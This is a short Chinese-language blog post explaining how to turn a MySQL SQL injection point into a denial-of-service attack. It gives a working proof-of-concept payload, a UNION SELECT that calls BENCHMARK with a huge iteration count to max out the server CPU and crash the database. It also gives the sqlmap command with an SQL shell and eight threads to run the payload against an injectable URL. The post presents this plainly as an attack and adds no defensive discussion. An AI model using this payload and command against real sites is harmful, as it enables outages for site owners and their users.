sqlmap ddos 宕机

mysql存在注入时,可以注入sleep语句,传入一个足够大的参数,因为引擎是myisam,并且拿来操作的是会锁表的语句,会瞬间造成服务器cpu 100%

由此产生ddos,资源利用只是一个注入,免去了那么多的个人pc

注入点:http://www.a.com/a.php?id=1

Poc:http://www.a.com/a.php?id=1 union select 1,benchmark(555555555,md5(0×55))

之后cpu瞬间就满了,数据库宕机

Sqlmap里:

sqlmap -u http://www.a.com/a.php?id=1 –sql-shell –threads 8

sql-shell>select 1,benchmark(555555555,md5(0×55))

未经允许不得转载:SuperMan's blog » sqlmap ddos 宕机

评论 0

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址